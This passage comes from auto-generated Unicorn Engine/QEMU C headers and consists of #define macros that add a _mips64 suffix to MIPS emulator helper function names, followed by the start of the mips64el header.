helper_cmpabs_ps_ngl_mips64 #define helper_cmp_ps_lt helper_cmp_ps_lt_mips64 #define helper_cmpabs_ps_lt helper_cmpabs_ps_lt_mips64 #define helper_cmp_ps_nge helper_cmp_ps_nge_mips64 #define helper_cmpabs_ps_nge helper_cmpabs_ps_nge_mips64 #define helper_cmp_ps_le helper_cmp_ps_le_mips64 #define helper_cmpabs_ps_le helper_cmpabs_ps_le_mips64 #define helper_cmp_ps_ngt helper_cmp_ps_ngt_mips64 #define 
helper_cmpabs_ps_ngt helper_cmpabs_ps_ngt_mips64 #define helper_r6_cmp_d_af helper_r6_cmp_d_af_mips64 #define helper_r6_cmp_d_un helper_r6_cmp_d_un_mips64 #define helper_r6_cmp_d_eq helper_r6_cmp_d_eq_mips64 #define helper_r6_cmp_d_ueq helper_r6_cmp_d_ueq_mips64 #define helper_r6_cmp_d_lt helper_r6_cmp_d_lt_mips64 #define helper_r6_cmp_d_ult helper_r6_cmp_d_ult_mips64 #define helper_r6_cmp_d_le helper_r6_cmp_d_le_mips64 #define helper_r6_cmp_d_ule helper_r6_cmp_d_ule_mips64 #define helper_r6_cmp_d_saf helper_r6_cmp_d_saf_mips64 #define helper_r6_cmp_d_sun helper_r6_cmp_d_sun_mips64 #define helper_r6_cmp_d_seq helper_r6_cmp_d_seq_mips64 #define helper_r6_cmp_d_sueq helper_r6_cmp_d_sueq_mips64 #define helper_r6_cmp_d_slt helper_r6_cmp_d_slt_mips64 #define helper_r6_cmp_d_sult helper_r6_cmp_d_sult_mips64 #define helper_r6_cmp_d_sle helper_r6_cmp_d_sle_mips64 #define helper_r6_cmp_d_sule helper_r6_cmp_d_sule_mips64 #define helper_r6_cmp_d_or helper_r6_cmp_d_or_mips64 #define helper_r6_cmp_d_une helper_r6_cmp_d_une_mips64 #define helper_r6_cmp_d_ne helper_r6_cmp_d_ne_mips64 #define helper_r6_cmp_d_sor helper_r6_cmp_d_sor_mips64 #define helper_r6_cmp_d_sune helper_r6_cmp_d_sune_mips64 #define helper_r6_cmp_d_sne helper_r6_cmp_d_sne_mips64 #define helper_r6_cmp_s_af helper_r6_cmp_s_af_mips64 #define helper_r6_cmp_s_un helper_r6_cmp_s_un_mips64 #define helper_r6_cmp_s_eq helper_r6_cmp_s_eq_mips64 #define helper_r6_cmp_s_ueq helper_r6_cmp_s_ueq_mips64 #define helper_r6_cmp_s_lt helper_r6_cmp_s_lt_mips64 #define helper_r6_cmp_s_ult helper_r6_cmp_s_ult_mips64 #define helper_r6_cmp_s_le helper_r6_cmp_s_le_mips64 #define helper_r6_cmp_s_ule helper_r6_cmp_s_ule_mips64 #define helper_r6_cmp_s_saf helper_r6_cmp_s_saf_mips64 #define helper_r6_cmp_s_sun helper_r6_cmp_s_sun_mips64 #define helper_r6_cmp_s_seq helper_r6_cmp_s_seq_mips64 #define helper_r6_cmp_s_sueq helper_r6_cmp_s_sueq_mips64 #define helper_r6_cmp_s_slt helper_r6_cmp_s_slt_mips64 #define helper_r6_cmp_s_sult helper_r6_cmp_s_sult_mips64 #define helper_r6_cmp_s_sle helper_r6_cmp_s_sle_mips64 #define helper_r6_cmp_s_sule helper_r6_cmp_s_sule_mips64 #define helper_r6_cmp_s_or helper_r6_cmp_s_or_mips64 #define helper_r6_cmp_s_une helper_r6_cmp_s_une_mips64 #define helper_r6_cmp_s_ne helper_r6_cmp_s_ne_mips64 #define helper_r6_cmp_s_sor helper_r6_cmp_s_sor_mips64 #define helper_r6_cmp_s_sune helper_r6_cmp_s_sune_mips64 #define helper_r6_cmp_s_sne helper_r6_cmp_s_sne_mips64 #define no_mmu_map_address no_mmu_map_address_mips64 #define fixed_mmu_map_address fixed_mmu_map_address_mips64 #define r4k_map_address r4k_map_address_mips64 #define cpu_mips_tlb_flush cpu_mips_tlb_flush_mips64 #define sync_c0_status sync_c0_status_mips64 #define cpu_mips_store_status cpu_mips_store_status_mips64 #define cpu_mips_store_cause cpu_mips_store_cause_mips64 #define mips_cpu_get_phys_page_debug mips_cpu_get_phys_page_debug_mips64 #define mips_cpu_tlb_fill mips_cpu_tlb_fill_mips64 #define cpu_mips_translate_address cpu_mips_translate_address_mips64 #define exception_resume_pc exception_resume_pc_mips64 #define mips_cpu_do_interrupt mips_cpu_do_interrupt_mips64 #define mips_cpu_exec_interrupt mips_cpu_exec_interrupt_mips64 #define r4k_invalidate_tlb r4k_invalidate_tlb_mips64 #define do_raise_exception_err do_raise_exception_err_mips64 #define helper_paddsb helper_paddsb_mips64 #define helper_paddusb helper_paddusb_mips64 #define helper_paddsh helper_paddsh_mips64 #define helper_paddush helper_paddush_mips64 #define helper_paddb helper_paddb_mips64 #define helper_paddh 
helper_paddh_mips64 #define helper_paddw helper_paddw_mips64 #define helper_psubsb helper_psubsb_mips64 #define helper_psubusb helper_psubusb_mips64 #define helper_psubsh helper_psubsh_mips64 #define helper_psubush helper_psubush_mips64 #define helper_psubb helper_psubb_mips64 #define helper_psubh helper_psubh_mips64 #define helper_psubw helper_psubw_mips64 #define helper_pshufh helper_pshufh_mips64 #define helper_packsswh helper_packsswh_mips64 #define helper_packsshb helper_packsshb_mips64 #define helper_packushb helper_packushb_mips64 #define helper_punpcklwd helper_punpcklwd_mips64 #define helper_punpckhwd helper_punpckhwd_mips64 #define helper_punpcklhw helper_punpcklhw_mips64 #define helper_punpckhhw helper_punpckhhw_mips64 #define helper_punpcklbh helper_punpcklbh_mips64 #define helper_punpckhbh helper_punpckhbh_mips64 #define helper_pavgh helper_pavgh_mips64 #define helper_pavgb helper_pavgb_mips64 #define helper_pmaxsh helper_pmaxsh_mips64 #define helper_pminsh helper_pminsh_mips64 #define helper_pmaxub helper_pmaxub_mips64 #define helper_pminub helper_pminub_mips64 #define helper_pcmpeqw helper_pcmpeqw_mips64 #define helper_pcmpgtw helper_pcmpgtw_mips64 #define helper_pcmpeqh helper_pcmpeqh_mips64 #define helper_pcmpgth helper_pcmpgth_mips64 #define helper_pcmpeqb helper_pcmpeqb_mips64 #define helper_pcmpgtb helper_pcmpgtb_mips64 #define helper_psllw helper_psllw_mips64 #define helper_psrlw helper_psrlw_mips64 #define helper_psraw helper_psraw_mips64 #define helper_psllh helper_psllh_mips64 #define helper_psrlh helper_psrlh_mips64 #define helper_psrah helper_psrah_mips64 #define helper_pmullh helper_pmullh_mips64 #define helper_pmulhh helper_pmulhh_mips64 #define helper_pmulhuh helper_pmulhuh_mips64 #define helper_pmaddhw helper_pmaddhw_mips64 #define helper_pasubub helper_pasubub_mips64 #define helper_biadd helper_biadd_mips64 #define helper_pmovmskb helper_pmovmskb_mips64 #define helper_msa_nloc_b helper_msa_nloc_b_mips64 #define helper_msa_nloc_h helper_msa_nloc_h_mips64 #define helper_msa_nloc_w helper_msa_nloc_w_mips64 #define helper_msa_nloc_d helper_msa_nloc_d_mips64 #define helper_msa_nlzc_b helper_msa_nlzc_b_mips64 #define helper_msa_nlzc_h helper_msa_nlzc_h_mips64 #define helper_msa_nlzc_w helper_msa_nlzc_w_mips64 #define helper_msa_nlzc_d helper_msa_nlzc_d_mips64 #define helper_msa_pcnt_b helper_msa_pcnt_b_mips64 #define helper_msa_pcnt_h helper_msa_pcnt_h_mips64 #define helper_msa_pcnt_w helper_msa_pcnt_w_mips64 #define helper_msa_pcnt_d helper_msa_pcnt_d_mips64 #define helper_msa_binsl_b helper_msa_binsl_b_mips64 #define helper_msa_binsl_h helper_msa_binsl_h_mips64 #define helper_msa_binsl_w helper_msa_binsl_w_mips64 #define helper_msa_binsl_d helper_msa_binsl_d_mips64 #define helper_msa_binsr_b helper_msa_binsr_b_mips64 #define helper_msa_binsr_h helper_msa_binsr_h_mips64 #define helper_msa_binsr_w helper_msa_binsr_w_mips64 #define helper_msa_binsr_d helper_msa_binsr_d_mips64 #define helper_msa_bmnz_v helper_msa_bmnz_v_mips64 #define helper_msa_bmz_v helper_msa_bmz_v_mips64 #define helper_msa_bsel_v helper_msa_bsel_v_mips64 #define helper_msa_bclr_b helper_msa_bclr_b_mips64 #define helper_msa_bclr_h helper_msa_bclr_h_mips64 #define helper_msa_bclr_w helper_msa_bclr_w_mips64 #define helper_msa_bclr_d helper_msa_bclr_d_mips64 #define helper_msa_bneg_b helper_msa_bneg_b_mips64 #define helper_msa_bneg_h helper_msa_bneg_h_mips64 #define helper_msa_bneg_w helper_msa_bneg_w_mips64 #define helper_msa_bneg_d helper_msa_bneg_d_mips64 #define helper_msa_bset_b 
helper_msa_bset_b_mips64 #define helper_msa_bset_h helper_msa_bset_h_mips64 #define helper_msa_bset_w helper_msa_bset_w_mips64 #define helper_msa_bset_d helper_msa_bset_d_mips64 #define helper_msa_add_a_b helper_msa_add_a_b_mips64 #define helper_msa_add_a_h helper_msa_add_a_h_mips64 #define helper_msa_add_a_w helper_msa_add_a_w_mips64 #define helper_msa_add_a_d helper_msa_add_a_d_mips64 #define helper_msa_adds_a_b helper_msa_adds_a_b_mips64 #define helper_msa_adds_a_h helper_msa_adds_a_h_mips64 #define helper_msa_adds_a_w helper_msa_adds_a_w_mips64 #define helper_msa_adds_a_d helper_msa_adds_a_d_mips64 #define helper_msa_adds_s_b helper_msa_adds_s_b_mips64 #define helper_msa_adds_s_h helper_msa_adds_s_h_mips64 #define helper_msa_adds_s_w helper_msa_adds_s_w_mips64 #define helper_msa_adds_s_d helper_msa_adds_s_d_mips64 #define helper_msa_adds_u_b helper_msa_adds_u_b_mips64 #define helper_msa_adds_u_h helper_msa_adds_u_h_mips64 #define helper_msa_adds_u_w helper_msa_adds_u_w_mips64 #define helper_msa_adds_u_d helper_msa_adds_u_d_mips64 #define helper_msa_addv_b helper_msa_addv_b_mips64 #define helper_msa_addv_h helper_msa_addv_h_mips64 #define helper_msa_addv_w helper_msa_addv_w_mips64 #define helper_msa_addv_d helper_msa_addv_d_mips64 #define helper_msa_hadd_s_h helper_msa_hadd_s_h_mips64 #define helper_msa_hadd_s_w helper_msa_hadd_s_w_mips64 #define helper_msa_hadd_s_d helper_msa_hadd_s_d_mips64 #define helper_msa_hadd_u_h helper_msa_hadd_u_h_mips64 #define helper_msa_hadd_u_w helper_msa_hadd_u_w_mips64 #define helper_msa_hadd_u_d helper_msa_hadd_u_d_mips64 #define helper_msa_ave_s_b helper_msa_ave_s_b_mips64 #define helper_msa_ave_s_h helper_msa_ave_s_h_mips64 #define helper_msa_ave_s_w helper_msa_ave_s_w_mips64 #define helper_msa_ave_s_d helper_msa_ave_s_d_mips64 #define helper_msa_ave_u_b helper_msa_ave_u_b_mips64 #define helper_msa_ave_u_h helper_msa_ave_u_h_mips64 #define helper_msa_ave_u_w helper_msa_ave_u_w_mips64 #define helper_msa_ave_u_d helper_msa_ave_u_d_mips64 #define helper_msa_aver_s_b helper_msa_aver_s_b_mips64 #define helper_msa_aver_s_h helper_msa_aver_s_h_mips64 #define helper_msa_aver_s_w helper_msa_aver_s_w_mips64 #define helper_msa_aver_s_d helper_msa_aver_s_d_mips64 #define helper_msa_aver_u_b helper_msa_aver_u_b_mips64 #define helper_msa_aver_u_h helper_msa_aver_u_h_mips64 #define helper_msa_aver_u_w helper_msa_aver_u_w_mips64 #define helper_msa_aver_u_d helper_msa_aver_u_d_mips64 #define helper_msa_ceq_b helper_msa_ceq_b_mips64 #define helper_msa_ceq_h helper_msa_ceq_h_mips64 #define helper_msa_ceq_w helper_msa_ceq_w_mips64 #define helper_msa_ceq_d helper_msa_ceq_d_mips64 #define helper_msa_cle_s_b helper_msa_cle_s_b_mips64 #define helper_msa_cle_s_h helper_msa_cle_s_h_mips64 #define helper_msa_cle_s_w helper_msa_cle_s_w_mips64 #define helper_msa_cle_s_d helper_msa_cle_s_d_mips64 #define helper_msa_cle_u_b helper_msa_cle_u_b_mips64 #define helper_msa_cle_u_h helper_msa_cle_u_h_mips64 #define helper_msa_cle_u_w helper_msa_cle_u_w_mips64 #define helper_msa_cle_u_d helper_msa_cle_u_d_mips64 #define helper_msa_clt_s_b helper_msa_clt_s_b_mips64 #define helper_msa_clt_s_h helper_msa_clt_s_h_mips64 #define helper_msa_clt_s_w helper_msa_clt_s_w_mips64 #define helper_msa_clt_s_d helper_msa_clt_s_d_mips64 #define helper_msa_clt_u_b helper_msa_clt_u_b_mips64 #define helper_msa_clt_u_h helper_msa_clt_u_h_mips64 #define helper_msa_clt_u_w helper_msa_clt_u_w_mips64 #define helper_msa_clt_u_d helper_msa_clt_u_d_mips64 #define helper_msa_div_s_b helper_msa_div_s_b_mips64 #define 
helper_msa_div_s_h helper_msa_div_s_h_mips64 #define helper_msa_div_s_w helper_msa_div_s_w_mips64 #define helper_msa_div_s_d helper_msa_div_s_d_mips64 #define helper_msa_div_u_b helper_msa_div_u_b_mips64 #define helper_msa_div_u_h helper_msa_div_u_h_mips64 #define helper_msa_div_u_w helper_msa_div_u_w_mips64 #define helper_msa_div_u_d helper_msa_div_u_d_mips64 #define helper_msa_max_a_b helper_msa_max_a_b_mips64 #define helper_msa_max_a_h helper_msa_max_a_h_mips64 #define helper_msa_max_a_w helper_msa_max_a_w_mips64 #define helper_msa_max_a_d helper_msa_max_a_d_mips64 #define helper_msa_max_s_b helper_msa_max_s_b_mips64 #define helper_msa_max_s_h helper_msa_max_s_h_mips64 #define helper_msa_max_s_w helper_msa_max_s_w_mips64 #define helper_msa_max_s_d helper_msa_max_s_d_mips64 #define helper_msa_max_u_b helper_msa_max_u_b_mips64 #define helper_msa_max_u_h helper_msa_max_u_h_mips64 #define helper_msa_max_u_w helper_msa_max_u_w_mips64 #define helper_msa_max_u_d helper_msa_max_u_d_mips64 #define helper_msa_min_a_b helper_msa_min_a_b_mips64 #define helper_msa_min_a_h helper_msa_min_a_h_mips64 #define helper_msa_min_a_w helper_msa_min_a_w_mips64 #define helper_msa_min_a_d helper_msa_min_a_d_mips64 #define helper_msa_min_s_b helper_msa_min_s_b_mips64 #define helper_msa_min_s_h helper_msa_min_s_h_mips64 #define helper_msa_min_s_w helper_msa_min_s_w_mips64 #define helper_msa_min_s_d helper_msa_min_s_d_mips64 #define helper_msa_min_u_b helper_msa_min_u_b_mips64 #define helper_msa_min_u_h helper_msa_min_u_h_mips64 #define helper_msa_min_u_w helper_msa_min_u_w_mips64 #define helper_msa_min_u_d helper_msa_min_u_d_mips64 #define helper_msa_mod_s_b helper_msa_mod_s_b_mips64 #define helper_msa_mod_s_h helper_msa_mod_s_h_mips64 #define helper_msa_mod_s_w helper_msa_mod_s_w_mips64 #define helper_msa_mod_s_d helper_msa_mod_s_d_mips64 #define helper_msa_mod_u_b helper_msa_mod_u_b_mips64 #define helper_msa_mod_u_h helper_msa_mod_u_h_mips64 #define helper_msa_mod_u_w helper_msa_mod_u_w_mips64 #define helper_msa_mod_u_d helper_msa_mod_u_d_mips64 #define helper_msa_asub_s_b helper_msa_asub_s_b_mips64 #define helper_msa_asub_s_h helper_msa_asub_s_h_mips64 #define helper_msa_asub_s_w helper_msa_asub_s_w_mips64 #define helper_msa_asub_s_d helper_msa_asub_s_d_mips64 #define helper_msa_asub_u_b helper_msa_asub_u_b_mips64 #define helper_msa_asub_u_h helper_msa_asub_u_h_mips64 #define helper_msa_asub_u_w helper_msa_asub_u_w_mips64 #define helper_msa_asub_u_d helper_msa_asub_u_d_mips64 #define helper_msa_hsub_s_h helper_msa_hsub_s_h_mips64 #define helper_msa_hsub_s_w helper_msa_hsub_s_w_mips64 #define helper_msa_hsub_s_d helper_msa_hsub_s_d_mips64 #define helper_msa_hsub_u_h helper_msa_hsub_u_h_mips64 #define helper_msa_hsub_u_w helper_msa_hsub_u_w_mips64 #define helper_msa_hsub_u_d helper_msa_hsub_u_d_mips64 #define helper_msa_ilvev_b helper_msa_ilvev_b_mips64 #define helper_msa_ilvev_h helper_msa_ilvev_h_mips64 #define helper_msa_ilvev_w helper_msa_ilvev_w_mips64 #define helper_msa_ilvev_d helper_msa_ilvev_d_mips64 #define helper_msa_ilvod_b helper_msa_ilvod_b_mips64 #define helper_msa_ilvod_h helper_msa_ilvod_h_mips64 #define helper_msa_ilvod_w helper_msa_ilvod_w_mips64 #define helper_msa_ilvod_d helper_msa_ilvod_d_mips64 #define helper_msa_ilvl_b helper_msa_ilvl_b_mips64 #define helper_msa_ilvl_h helper_msa_ilvl_h_mips64 #define helper_msa_ilvl_w helper_msa_ilvl_w_mips64 #define helper_msa_ilvl_d helper_msa_ilvl_d_mips64 #define helper_msa_ilvr_b helper_msa_ilvr_b_mips64 #define helper_msa_ilvr_h 
helper_msa_ilvr_h_mips64 #define helper_msa_ilvr_w helper_msa_ilvr_w_mips64 #define helper_msa_ilvr_d helper_msa_ilvr_d_mips64 #define helper_msa_and_v helper_msa_and_v_mips64 #define helper_msa_nor_v helper_msa_nor_v_mips64 #define helper_msa_or_v helper_msa_or_v_mips64 #define helper_msa_xor_v helper_msa_xor_v_mips64 #define helper_msa_move_v helper_msa_move_v_mips64 #define helper_msa_pckev_b helper_msa_pckev_b_mips64 #define helper_msa_pckev_h helper_msa_pckev_h_mips64 #define helper_msa_pckev_w helper_msa_pckev_w_mips64 #define helper_msa_pckev_d helper_msa_pckev_d_mips64 #define helper_msa_pckod_b helper_msa_pckod_b_mips64 #define helper_msa_pckod_h helper_msa_pckod_h_mips64 #define helper_msa_pckod_w helper_msa_pckod_w_mips64 #define helper_msa_pckod_d helper_msa_pckod_d_mips64 #define helper_msa_sll_b helper_msa_sll_b_mips64 #define helper_msa_sll_h helper_msa_sll_h_mips64 #define helper_msa_sll_w helper_msa_sll_w_mips64 #define helper_msa_sll_d helper_msa_sll_d_mips64 #define helper_msa_sra_b helper_msa_sra_b_mips64 #define helper_msa_sra_h helper_msa_sra_h_mips64 #define helper_msa_sra_w helper_msa_sra_w_mips64 #define helper_msa_sra_d helper_msa_sra_d_mips64 #define helper_msa_srar_b helper_msa_srar_b_mips64 #define helper_msa_srar_h helper_msa_srar_h_mips64 #define helper_msa_srar_w helper_msa_srar_w_mips64 #define helper_msa_srar_d helper_msa_srar_d_mips64 #define helper_msa_srl_b helper_msa_srl_b_mips64 #define helper_msa_srl_h helper_msa_srl_h_mips64 #define helper_msa_srl_w helper_msa_srl_w_mips64 #define helper_msa_srl_d helper_msa_srl_d_mips64 #define helper_msa_srlr_b helper_msa_srlr_b_mips64 #define helper_msa_srlr_h helper_msa_srlr_h_mips64 #define helper_msa_srlr_w helper_msa_srlr_w_mips64 #define helper_msa_srlr_d helper_msa_srlr_d_mips64 #define helper_msa_andi_b helper_msa_andi_b_mips64 #define helper_msa_ori_b helper_msa_ori_b_mips64 #define helper_msa_nori_b helper_msa_nori_b_mips64 #define helper_msa_xori_b helper_msa_xori_b_mips64 #define helper_msa_bmnzi_b helper_msa_bmnzi_b_mips64 #define helper_msa_bmzi_b helper_msa_bmzi_b_mips64 #define helper_msa_bseli_b helper_msa_bseli_b_mips64 #define helper_msa_shf_df helper_msa_shf_df_mips64 #define helper_msa_addvi_df helper_msa_addvi_df_mips64 #define helper_msa_subvi_df helper_msa_subvi_df_mips64 #define helper_msa_ceqi_df helper_msa_ceqi_df_mips64 #define helper_msa_clei_s_df helper_msa_clei_s_df_mips64 #define helper_msa_clei_u_df helper_msa_clei_u_df_mips64 #define helper_msa_clti_s_df helper_msa_clti_s_df_mips64 #define helper_msa_clti_u_df helper_msa_clti_u_df_mips64 #define helper_msa_maxi_s_df helper_msa_maxi_s_df_mips64 #define helper_msa_maxi_u_df helper_msa_maxi_u_df_mips64 #define helper_msa_mini_s_df helper_msa_mini_s_df_mips64 #define helper_msa_mini_u_df helper_msa_mini_u_df_mips64 #define helper_msa_ldi_df helper_msa_ldi_df_mips64 #define helper_msa_slli_df helper_msa_slli_df_mips64 #define helper_msa_srai_df helper_msa_srai_df_mips64 #define helper_msa_srli_df helper_msa_srli_df_mips64 #define helper_msa_bclri_df helper_msa_bclri_df_mips64 #define helper_msa_bseti_df helper_msa_bseti_df_mips64 #define helper_msa_bnegi_df helper_msa_bnegi_df_mips64 #define helper_msa_sat_s_df helper_msa_sat_s_df_mips64 #define helper_msa_sat_u_df helper_msa_sat_u_df_mips64 #define helper_msa_srari_df helper_msa_srari_df_mips64 #define helper_msa_srlri_df helper_msa_srlri_df_mips64 #define helper_msa_binsli_df helper_msa_binsli_df_mips64 #define helper_msa_binsri_df helper_msa_binsri_df_mips64 #define 
helper_msa_subv_df helper_msa_subv_df_mips64 #define helper_msa_subs_s_df helper_msa_subs_s_df_mips64 #define helper_msa_subs_u_df helper_msa_subs_u_df_mips64 #define helper_msa_subsus_u_df helper_msa_subsus_u_df_mips64 #define helper_msa_subsuu_s_df helper_msa_subsuu_s_df_mips64 #define helper_msa_mulv_df helper_msa_mulv_df_mips64 #define helper_msa_dotp_s_df helper_msa_dotp_s_df_mips64 #define helper_msa_dotp_u_df helper_msa_dotp_u_df_mips64 #define helper_msa_mul_q_df helper_msa_mul_q_df_mips64 #define helper_msa_mulr_q_df helper_msa_mulr_q_df_mips64 #define helper_msa_sld_df helper_msa_sld_df_mips64 #define helper_msa_maddv_df helper_msa_maddv_df_mips64 #define helper_msa_msubv_df helper_msa_msubv_df_mips64 #define helper_msa_dpadd_s_df helper_msa_dpadd_s_df_mips64 #define helper_msa_dpadd_u_df helper_msa_dpadd_u_df_mips64 #define helper_msa_dpsub_s_df helper_msa_dpsub_s_df_mips64 #define helper_msa_dpsub_u_df helper_msa_dpsub_u_df_mips64 #define helper_msa_binsl_df helper_msa_binsl_df_mips64 #define helper_msa_binsr_df helper_msa_binsr_df_mips64 #define helper_msa_madd_q_df helper_msa_madd_q_df_mips64 #define helper_msa_msub_q_df helper_msa_msub_q_df_mips64 #define helper_msa_maddr_q_df helper_msa_maddr_q_df_mips64 #define helper_msa_msubr_q_df helper_msa_msubr_q_df_mips64 #define helper_msa_splat_df helper_msa_splat_df_mips64 #define helper_msa_vshf_df helper_msa_vshf_df_mips64 #define helper_msa_sldi_df helper_msa_sldi_df_mips64 #define helper_msa_splati_df helper_msa_splati_df_mips64 #define helper_msa_copy_s_b helper_msa_copy_s_b_mips64 #define helper_msa_copy_s_h helper_msa_copy_s_h_mips64 #define helper_msa_copy_s_w helper_msa_copy_s_w_mips64 #define helper_msa_copy_s_d helper_msa_copy_s_d_mips64 #define helper_msa_copy_u_b helper_msa_copy_u_b_mips64 #define helper_msa_copy_u_h helper_msa_copy_u_h_mips64 #define helper_msa_copy_u_w helper_msa_copy_u_w_mips64 #define helper_msa_insert_b helper_msa_insert_b_mips64 #define helper_msa_insert_h helper_msa_insert_h_mips64 #define helper_msa_insert_w helper_msa_insert_w_mips64 #define helper_msa_insert_d helper_msa_insert_d_mips64 #define helper_msa_insve_df helper_msa_insve_df_mips64 #define helper_msa_ctcmsa helper_msa_ctcmsa_mips64 #define helper_msa_cfcmsa helper_msa_cfcmsa_mips64 #define helper_msa_fill_df helper_msa_fill_df_mips64 #define helper_msa_fcaf_df helper_msa_fcaf_df_mips64 #define helper_msa_fcun_df helper_msa_fcun_df_mips64 #define helper_msa_fceq_df helper_msa_fceq_df_mips64 #define helper_msa_fcueq_df helper_msa_fcueq_df_mips64 #define helper_msa_fclt_df helper_msa_fclt_df_mips64 #define helper_msa_fcult_df helper_msa_fcult_df_mips64 #define helper_msa_fcle_df helper_msa_fcle_df_mips64 #define helper_msa_fcule_df helper_msa_fcule_df_mips64 #define helper_msa_fsaf_df helper_msa_fsaf_df_mips64 #define helper_msa_fsun_df helper_msa_fsun_df_mips64 #define helper_msa_fseq_df helper_msa_fseq_df_mips64 #define helper_msa_fsueq_df helper_msa_fsueq_df_mips64 #define helper_msa_fslt_df helper_msa_fslt_df_mips64 #define helper_msa_fsult_df helper_msa_fsult_df_mips64 #define helper_msa_fsle_df helper_msa_fsle_df_mips64 #define helper_msa_fsule_df helper_msa_fsule_df_mips64 #define helper_msa_fcor_df helper_msa_fcor_df_mips64 #define helper_msa_fcune_df helper_msa_fcune_df_mips64 #define helper_msa_fcne_df helper_msa_fcne_df_mips64 #define helper_msa_fsor_df helper_msa_fsor_df_mips64 #define helper_msa_fsune_df helper_msa_fsune_df_mips64 #define helper_msa_fsne_df helper_msa_fsne_df_mips64 #define helper_msa_fadd_df 
helper_msa_fadd_df_mips64 #define helper_msa_fsub_df helper_msa_fsub_df_mips64 #define helper_msa_fmul_df helper_msa_fmul_df_mips64 #define helper_msa_fdiv_df helper_msa_fdiv_df_mips64 #define helper_msa_fmadd_df helper_msa_fmadd_df_mips64 #define helper_msa_fmsub_df helper_msa_fmsub_df_mips64 #define helper_msa_fexp2_df helper_msa_fexp2_df_mips64 #define helper_msa_fexdo_df helper_msa_fexdo_df_mips64 #define helper_msa_ftq_df helper_msa_ftq_df_mips64 #define helper_msa_fmin_df helper_msa_fmin_df_mips64 #define helper_msa_fmin_a_df helper_msa_fmin_a_df_mips64 #define helper_msa_fmax_df helper_msa_fmax_df_mips64 #define helper_msa_fmax_a_df helper_msa_fmax_a_df_mips64 #define helper_msa_fclass_df helper_msa_fclass_df_mips64 #define helper_msa_ftrunc_s_df helper_msa_ftrunc_s_df_mips64 #define helper_msa_ftrunc_u_df helper_msa_ftrunc_u_df_mips64 #define helper_msa_fsqrt_df helper_msa_fsqrt_df_mips64 #define helper_msa_frsqrt_df helper_msa_frsqrt_df_mips64 #define helper_msa_frcp_df helper_msa_frcp_df_mips64 #define helper_msa_frint_df helper_msa_frint_df_mips64 #define helper_msa_flog2_df helper_msa_flog2_df_mips64 #define helper_msa_fexupl_df helper_msa_fexupl_df_mips64 #define helper_msa_fexupr_df helper_msa_fexupr_df_mips64 #define helper_msa_ffql_df helper_msa_ffql_df_mips64 #define helper_msa_ffqr_df helper_msa_ffqr_df_mips64 #define helper_msa_ftint_s_df helper_msa_ftint_s_df_mips64 #define helper_msa_ftint_u_df helper_msa_ftint_u_df_mips64 #define helper_msa_ffint_s_df helper_msa_ffint_s_df_mips64 #define helper_msa_ffint_u_df helper_msa_ffint_u_df_mips64 #define helper_raise_exception_err helper_raise_exception_err_mips64 #define helper_raise_exception helper_raise_exception_mips64 #define helper_raise_exception_debug helper_raise_exception_debug_mips64 #define helper_muls helper_muls_mips64 #define helper_mulsu helper_mulsu_mips64 #define helper_macc helper_macc_mips64 #define helper_macchi helper_macchi_mips64 #define helper_maccu helper_maccu_mips64 #define helper_macchiu helper_macchiu_mips64 #define helper_msac helper_msac_mips64 #define helper_msachi helper_msachi_mips64 #define helper_msacu helper_msacu_mips64 #define helper_msachiu helper_msachiu_mips64 #define helper_mulhi helper_mulhi_mips64 #define helper_mulhiu helper_mulhiu_mips64 #define helper_mulshi helper_mulshi_mips64 #define helper_mulshiu helper_mulshiu_mips64 #define helper_dbitswap helper_dbitswap_mips64 #define helper_bitswap helper_bitswap_mips64 #define helper_rotx helper_rotx_mips64 #define helper_ll helper_ll_mips64 #define helper_lld helper_lld_mips64 #define helper_swl helper_swl_mips64 #define helper_swr helper_swr_mips64 #define helper_sdl helper_sdl_mips64 #define helper_sdr helper_sdr_mips64 #define helper_lwm helper_lwm_mips64 #define helper_swm helper_swm_mips64 #define helper_ldm helper_ldm_mips64 #define helper_sdm helper_sdm_mips64 #define helper_fork helper_fork_mips64 #define helper_yield helper_yield_mips64 #define r4k_helper_tlbinv r4k_helper_tlbinv_mips64 #define r4k_helper_tlbinvf r4k_helper_tlbinvf_mips64 #define r4k_helper_tlbwi r4k_helper_tlbwi_mips64 #define r4k_helper_tlbwr r4k_helper_tlbwr_mips64 #define r4k_helper_tlbp r4k_helper_tlbp_mips64 #define r4k_helper_tlbr r4k_helper_tlbr_mips64 #define helper_tlbwi helper_tlbwi_mips64 #define helper_tlbwr helper_tlbwr_mips64 #define helper_tlbp helper_tlbp_mips64 #define helper_tlbr helper_tlbr_mips64 #define helper_tlbinv helper_tlbinv_mips64 #define helper_tlbinvf helper_tlbinvf_mips64 #define helper_ginvt helper_ginvt_mips64 #define 
helper_di helper_di_mips64 #define helper_ei helper_ei_mips64 #define helper_eret helper_eret_mips64 #define helper_eretnc helper_eretnc_mips64 #define helper_deret helper_deret_mips64 #define helper_rdhwr_cpunum helper_rdhwr_cpunum_mips64 #define helper_rdhwr_synci_step helper_rdhwr_synci_step_mips64 #define helper_rdhwr_cc helper_rdhwr_cc_mips64 #define helper_rdhwr_ccres helper_rdhwr_ccres_mips64 #define helper_rdhwr_performance helper_rdhwr_performance_mips64 #define helper_rdhwr_xnp helper_rdhwr_xnp_mips64 #define helper_pmon helper_pmon_mips64 #define helper_wait helper_wait_mips64 #define mips_cpu_do_unaligned_access mips_cpu_do_unaligned_access_mips64 #define mips_cpu_do_transaction_failed mips_cpu_do_transaction_failed_mips64 #define helper_msa_ld_b helper_msa_ld_b_mips64 #define helper_msa_ld_h helper_msa_ld_h_mips64 #define helper_msa_ld_w helper_msa_ld_w_mips64 #define helper_msa_ld_d helper_msa_ld_d_mips64 #define helper_msa_st_b helper_msa_st_b_mips64 #define helper_msa_st_h helper_msa_st_h_mips64 #define helper_msa_st_w helper_msa_st_w_mips64 #define helper_msa_st_d helper_msa_st_d_mips64 #define helper_cache helper_cache_mips64 #define gen_intermediate_code gen_intermediate_code_mips64 #define mips_tcg_init mips_tcg_init_mips64 #define cpu_mips_realize_env cpu_mips_realize_env_mips64 #define cpu_state_reset cpu_state_reset_mips64 #define restore_state_to_opc restore_state_to_opc_mips64 #define ieee_rm ieee_rm_mips64 #define mips_defs mips_defs_mips64 #define mips_defs_number mips_defs_number_mips64 #define gen_helper_float_class_s gen_helper_float_class_s_mips64 #define gen_helper_float_class_d gen_helper_float_class_d_mips64 #endif
unicorn-2.1.1/qemu/mips64el.h
/* Autogen header for Unicorn Engine - DO NOT MODIFY */
#ifndef UNICORN_AUTOGEN_mips64el_H
#define UNICORN_AUTOGEN_mips64el_H
